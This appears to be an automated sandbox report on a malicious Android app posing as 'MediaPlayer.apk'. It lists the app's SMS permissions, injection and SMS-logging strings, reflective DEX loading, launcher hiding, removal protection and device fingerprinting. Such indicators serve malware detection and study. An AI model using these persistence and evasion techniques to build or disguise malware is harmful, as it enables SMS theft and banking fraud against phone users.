Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.facebook.katana"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.whatsapp"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.google.android.youtube"
Source: Lcabbage/grace/solid/util/a;-><clinit>()V | Method string: "com.twitter.android"
Has permission to send SMS in the background
Source: submitted apk | Request permission: android.permission.SEND_SMS
Has permission to write to the SMS storage
Source: submitted apk | Request permission: android.permission.WRITE_SMS
May access the Android keyguard (lock screen)
Source: rA.json.dr | String found in binary or memory: 5Landroid/app/KeyguardManager$KeyguardDismissCallback;
Source: rA.json.dr | String found in binary or memory: Landroid/app/FragmentManager;5Landroid/app/KeyguardManager$KeyguardDismissCallback;
Source: rA.json.dr | String found in binary or memory: Landroid/app/KeyguardManager;
Source: rA.json.dr | String found in binary or memory: Landroid/app/KeyguardManager;)Landroid/app/Notification$Action$Builder;!Landroid/app/Notification$Action;*Landroid/app/Notification$BigPictureStyle;'Landroid/app/Notification$BigTextStyle;"Landroid/app/Notification$Builder;%Landroid/app/Notification$InboxStyle;1Landroid/app/Notification$MessagingStyle$Message;)Landroid/app/Notification$MessagingStyle; Landroid/app/Notification$Style;
Source: rA.json.dr | String found in binary or memory: isKeyguardLocked
Source: rA.json.dr | String found in binary or memory: keyguard
Source: rA.json.dr | String found in binary or memory: requestDismissKeyguard
Installs a new wake lock
Source: cabbage.grace.solid.h.a;->a:19 | API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.receiver.AWdjkwa90dA;->b:13 | API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.AawidnaoDNI;->p:187 | API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.e;->d:185 | API Call: android.os.PowerManager$WakeLock.acquire
Source: cabbage.grace.solid.util.b;->r:161 | API Call: android.app.AlarmManager.setRepeating

System Summary:

Found detection on Joe Sandbox Cloud Basic
Source: MediaPlayer.apk | Joe Sandbox Cloud Basic: Detection: malicious Score: 80
Requests to ignore battery optimizations
Source: Lcabbage/grace/solid/andaowidnAIObdnaw;->onAccessibilityEvent(Landroid/view/accessibility/AccessibilityEvent;)V | Method string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Executes native commands
Source: org.xbill.DNS.ResolverConfig;->f:68 | API Call: java.lang.Runtime.exec
Source: org.xbill.DNS.ResolverConfig;->h:99 | API Call: java.lang.Runtime.exec ("ipconfig /all")
Source: piuk.blockchain.android.util.RootUtil;->checkSu:19 | API Call: java.lang.Runtime.exec
Requests potentially dangerous permissions
Source: submitted apk | Request permission: android.permission.INTERNET
Source: submitted apk | Request permission: android.permission.MODIFY_AUDIO_SETTINGS
Source: submitted apk | Request permission: android.permission.READ_PHONE_STATE
Source: submitted apk | Request permission: android.permission.READ_SMS
Source: submitted apk | Request permission: android.permission.RECEIVE_MMS
Source: submitted apk | Request permission: android.permission.RECEIVE_SMS
Source: submitted apk | Request permission: android.permission.SEND_SMS
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apk | Request permission: android.permission.WAKE_LOCK
Source: submitted apk | Request permission: android.permission.WRITE_SMS
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.andAPK@0/252@2/0
Source: org.webrtc.CallSessionFileRotatingLogSink;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.FileVideoCapturer;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.Logging;->loadNativeLibrary:56 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.PeerConnection;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.PeerConnectionFactory;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: org.webrtc.VideoFileRenderer;-><clinit>:2 | API Call: java.lang.System.loadLibrary ("jingle_peerconnection_so")
Source: cabbage.grace.solid.j.a;->e:36 | API Call: "def_sms_manager": null
Source: cabbage.grace.solid.j.a;->e:36 | API Call: "logged_sms": null
Source: cabbage.grace.solid.j.a;->e:36 | API Call: "captured_injects": null
Source: cabbage.grace.solid.j.a;->e:36 | API Call: "domains": null
Source: cabbage.grace.solid.j.a;->d:21 | API Call: android.content.SharedPreferences.getString
Source: cabbage.grace.solid.j.a;->g:42 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;-><init>:16 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;->onPause:27 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageModule;->onResume:34 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageManager;->getPin:31 | API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.PinStorage.PinStorageManager;->getSetting:36 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.PinStorage.PinStorageManager;->verifyPin:92 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.a.d;->d:30 | API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.accessibilityprotection.AccessibilityProtectionDelegate;->authorized:13 | API Call: android.content.SharedPreferences.getBoolean
Source: com.coinbase.android.authDataStorage.AuthDataStorageModule;->getAuthData:73 | API Call: android.content.SharedPreferences.getString
Source: com.google.firebase.perf.config.DeviceCacheManager;->getBoolean:31 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.firebase.perf.config.DeviceCacheManager;->getString:98 | API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.c;->call:6 | API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.i;->call:5 | API Call: android.content.SharedPreferences.getString
Source: com.coinbase.android.secureStorage.SecureStorageManager;->getData:19 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getPinId:183 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:221 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:227 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->getValue:232 | API Call: android.content.SharedPreferences.getBoolean
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->hasBackup:237 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:277 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:283 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:289 | API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:297 | API Call: android.content.SharedPreferences.getString
Source: org.appspot.apprtc.AppRTCProximitySensor;->e:72 | API Call: android.hardware.SensorManager.registerListener
Source: com.coinbase.android.accessibilityprotection.actions.shake.ShakeAction;->startGestureTracking:20 | API Call: android.hardware.SensorManager.registerListener

Data Obfuscation:

Accesses FileOutputStream via Reflection
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Reflective call: java.io.FileOutputStream@6119149
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Reflective call: public void java.io.FileOutputStream.write(byte[]) throws java.io.IOException
Loads new DEX files via dynamic constructor
Source: trouble.canyon.van.MIfUpWsMoKa;->nutventure:106 | API Call: Constructor call: public dalvik.system.DexClassLoader(java.lang.String,java.lang.String,java.lang.String,java.lang.ClassLoader)
Source: Lb/a/a/a/c/q;->z()[B | Method string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ Length: 4395
Source: MediaPlayer.apk | Total valid method names: 63%
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: android.content.res.AssetManager@df55307
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: android.content.res.AssetManager@df55307
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final int android.content.res.AssetManager.addAssetPath(java.lang.String)
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: android.app.ContextImpl@deb8a64
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public android.content.res.AssetManager android.app.ContextImpl.getAssets()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: android.content.res.AssetManager@3149085
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public int java.io.FilterInputStream.read(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public int java.io.FilterInputStream.read(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public synchronized int java.io.BufferedInputStream.read(byte[],int,int) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: java.io.BufferedInputStream@6a5559a
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: java.io.BufferedInputStream@6a5559a
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public void java.io.BufferedInputStream.close() throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: yllEs
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: yllEs
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public byte[] java.lang.String.getBytes()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: java.io.FileOutputStream@6119149
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public void java.io.FileOutputStream.write(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public void java.io.BufferedInputStream.close() throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: java.io.BufferedOutputStream@6d7ee5c
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: java.io.BufferedOutputStream@6d7ee5c
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310 | API Call: Real call: public void java.io.FilterOutputStream.close() throws java.io.IOException
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: null
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: public static android.app.ActivityThread android.app.ActivityThread.currentActivityThread()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: final android.util.ArrayMap android.app.ActivityThread.mPackages
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: public native java.lang.Object java.lang.reflect.Field.get(java.lang.Object) throws java.lang.IllegalAccessException,java.lang.IllegalArgumentException
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: java.lang.ref.WeakReference@c6feb2b
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: public java.lang.Object java.lang.ref.Reference.get()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71 | API Call: Real call: public native java.lang.Object java.lang.reflect.Field.get(java.lang.Object) throws java.lang.IllegalAccessException,java.lang.IllegalArgumentException
Source: cabbage.grace.solid.util.m;->f:83 | API Call: java.lang.reflect.Method.invoke
Source: trouble.canyon.van.MMqQaBuGxNtCgMt;->weirdfever:139 | API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->g:89 | API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:170 | API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:173 | API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:176 | API Call: java.lang.reflect.Method.invoke
Source: a.a.a.a.d0;->a:6 | API Call: java.lang.reflect.Method.invoke
Source: a.a.a.a.g0;->e:36 | API Call: java.lang.reflect.Field.get
Source: a.a.a.a.n;->R0:71 | API Call: java.lang.reflect.Field.get
Source: b.a.a.a.d.c;->y:9 | API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.gcj.GCJInstantiator;->newInstance:6 | API Call: java.lang.reflect.Method.invoke
Source: org.slf4j.helpers.SubstituteLogger;->log:112 | API Call: java.lang.reflect.Method.invoke
Source: org.json.JSONObject;-><init>:11 | API Call: java.lang.reflect.Field.get
Source: org.json.JSONObject;->populateInternalMap:127 | API Call: java.lang.reflect.Method.invoke
Source: org.parceler.InjectionUtil$GetFieldPrivilegedAction;->b:5 | API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.perc.PercInstantiator;->newInstance:11 | API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.strategy.PlatformDescription;->b:23 | API Call: java.lang.reflect.Field.get
Source: org.objenesis.strategy.PlatformDescription;->e:38 | API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.sun.SunReflectionFactoryHelper;->a:3 | API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.instantiator.sun.SunReflectionFactoryHelper;->d:17 | API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.instantiator.sun.UnsafeFactoryInstantiator;-><init>:6 | API Call: java.lang.reflect.Field.get
Source: org.appspot.apprtc.util.ScreenUtils;->a:11 | API Call: java.lang.reflect.Method.invoke
Source: org.appspot.apprtc.util.ScreenUtils;->a:13 | API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->applyOpenSSLFix:10 | API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->applyOpenSSLFix:17 | API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->getDeviceSerialNumber:55 | API Call: java.lang.reflect.Field.get

Persistence and Installation Behavior:

Drops a new dex file
Source: Android App | File dump: /data/user/0/trouble.canyon.van/app_DynamicOptDex/rA.json
Source: submitted apk | Request permission: android.permission.RECEIVE_BOOT_COMPLETED
Source: cabbage.grace.solid.h.a;->a:18 | API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.receiver.AWdjkwa90dA;->b:12 | API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.AawidnaoDNI;->p:186 | API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.e;->d:184 | API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

Protects itself from removal
Source: cabbage.grace.solid.util.k;->b:20 | API Calls in same method context: AccessibilityNodeInfo.findAccessibilityNodeInfosByText, AccessibilityEvent.getPackageName
Removes its application launcher (likely to stay hidden)
Source: cabbage.grace.solid.andaowidnAIObdnaw;->onServiceConnected:255 | API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Starts/registers a service/receiver on screen off
Source: cabbage.grace.solid.AawidnaoDNI;->p:204 | API Call: cabbage.grace.solid.AawidnaoDNI.registerReceiver
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:27 | API Call: android.content.BroadcastReceiver.abortBroadcast
Source: submitted apk | Request permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apk | Request permission: android.permission.KILL_BACKGROUND_PROCESSES
Source: com.google.firebase.perf.internal.GaugeMetadataManager;->getCurrentProcessName:13 | API Call: android.app.ActivityManager.getRunningAppProcesses
Source: org.xbill.DNS.DNSSEC;->g:79 | API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:87 | API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:89 | API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:91 | API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:94 | API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.DNSSEC;->g:96 | API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.DNSSEC;->g:97 | API Call: java.security.MessageDigest.digest
Source: org.xbill.DNS.NSEC3Record;->hashName:19 | API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.NSEC3Record;->hashName:22 | API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:23 | API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:24 | API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:25 | API Call: java.security.MessageDigest.digest
Source: com.coinbase.android.PinStorage.PinStorageManager;->getCipher:10 | API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->getOrCreateEncryptionKey:27 | API Call: javax.crypto.KeyGenerator.generateKey
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:45 | API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:50 | API Call: javax.crypto.Cipher.init
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:52 | API Call: javax.crypto.Cipher.doFinal
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:66 | API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:71 | API Call: javax.crypto.Cipher.init
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:83 | API Call: javax.crypto.Cipher.doFinal
Source: com.facebook.common.util.SecureHashUtil;->makeHash:8 | API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeHash:10 | API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeHash:11 | API Call: java.security.MessageDigest.digest
Source: com.facebook.common.util.SecureHashUtil;->makeHash:15 | API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeHash:16 | API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeHash:17 | API Call: java.security.MessageDigest.digest
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:36 | API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:37 | API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:38 | API Call: java.security.MessageDigest.digest
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:43 | API Call: java.security.MessageDigest.getInstance
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:45 | API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:53 | API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:59 | API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:65 | API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:66 | API Call: java.security.MessageDigest.digest
Source: Lorg/appspot/apprtc/CpuMonitor;->j()Lorg/appspot/apprtc/CpuMonitor$ProcStat; | Method string: "/proc/stat"
Source: cabbage.grace.solid.andwioawdnbawuiDa;->onCreate:63 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.b;->g:69 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.b;->g:70 | Field Access: android.os.Build.MODEL
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:18 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:23 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:28 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.h.e;->b:19 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.AawidnaoDNI$a$a;->run:40 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.andaowidnAIObdnaw;->onAccessibilityEvent:67 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:264 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:279 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:319 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:102 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:108 | Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:129 | Field Access: android.os.Build.MANUFACTURER
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:45 | Field Access: android.os.Build.PRODUCT
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:50 | Field Access: android.os.Build.DEVICE
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:55 | Field Access: android.os.Build.BRAND
Source: piuk.blockchain.android.util.RootUtil;->buildTags:2 | Field Access: android.os.Build.TAGS
Source: org.appspot.apprtc.util.AppRTCUtils;->c:22 | Field Access: android.os.Build$VERSION.RELEASE
Source: org.appspot.apprtc.util.AppRTCUtils;->c:26 | Field Access: android.os.Build.BRAND
Source: org.appspot.apprtc.util.AppRTCUtils;->c:30 | Field Access: android.os.Build.DEVICE
Source: org.appspot.apprtc.util.AppRTCUtils;->c:34 | Field Access: android.os.Build.ID
Source: org.appspot.apprtc.util.AppRTCUtils;->c:42 | Field Access: android.os.Build.MANUFACTURER
Source: org.appspot.apprtc.util.AppRTCUtils;->c:46 | Field Access: android.os.Build.MODEL
Source: org.appspot.apprtc.util.AppRTCUtils;->c:50 | Field Access: android.os.Build.PRODUCT
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:46 | Field Access: android.os.Build.MANUFACTURER
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:54 | Field Access: android.os.Build.MODEL
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:60 | Field Access: android.os.Build.DEVICE
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->getBuildFingerprintAndDeviceSerial:44 | Field Access: android.os.Build.FINGERPRINT
Source: org.webrtc.voiceengine.BuildInfo;->getAndroidBuildId:2 | Field Access: android.os.Build.ID
Source: org.webrtc.voiceengine.BuildInfo;->getBrand:3 | Field Access: android.os.Build.BRAND
Source: org.webrtc.voiceengine.BuildInfo;->getBuildRelease:4 | Field Access: android.os.Build$VERSION.RELEASE
Source: org.webrtc.voiceengine.BuildInfo;->getBuildType:5 | Field Access: android.os.Build.TYPE
Source: org.webrtc.voiceengine.BuildInfo;->getDevice:6 | Field Access: android.os.Build.DEVICE
Source: org.webrtc.voiceengine.BuildInfo;->getDeviceManufacturer:7 | Field Access: android.os.Build.MANUFACTURER
Source: org.webrtc.voiceengine.BuildInfo;->getDeviceModel:8 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.BuildInfo;->getProduct:9 | Field Access: android.os.Build.PRODUCT
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isAcousticEchoCancelerBlacklisted:49 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isAcousticEchoCancelerBlacklisted:52 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isNoiseSuppressorBlacklisted:73 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isNoiseSuppressorBlacklisted:76 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioManager;->isDeviceBlacklistedForOpenSLESUsage:102 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->deviceIsBlacklistedForOpenSLESUsage:4 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:35 | Field Access: android.os.Build$VERSION.RELEASE
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:39 | Field Access: android.os.Build.BRAND
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:43 | Field Access: android.os.Build.DEVICE
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:47 | Field Access: android.os.Build.ID
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:55 | Field Access: android.os.Build.MANUFACTURER
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:59 | Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:63 | Field Access: android.os.Build.PRODUCT
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->runningOnEmulator:70 | Field Access: android.os.Build.BRAND
Source: org.webrtc.HardwareVideoEncoderFactory;->isHardwareSupportedInCurrentSdkH264:58 | Field Access: android.os.Build.MODEL
Source: org.webrtc.MediaCodecVideoEncoder;->findHwEncoder:68 | Field Access: android.os.Build.MODEL
Source: org.webrtc.MediaCodecVideoEncoder;->findHwEncoder:73 | Field Access: android.os.Build.MODEL
Source: Lorg/appspot/apprtc/CpuMonitor;->f()V | Method string: "/sys/devices/system/cpu/present"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()V | Method string: "Cannot do CPU stats due to /sys/devices/system/cpu/present parsing problem"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()V | Method string: "Cannot do CPU stats since /sys/devices/system/cpu/present is missing"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()V | Method string: "/sys/devices/system/cpu/cpu"
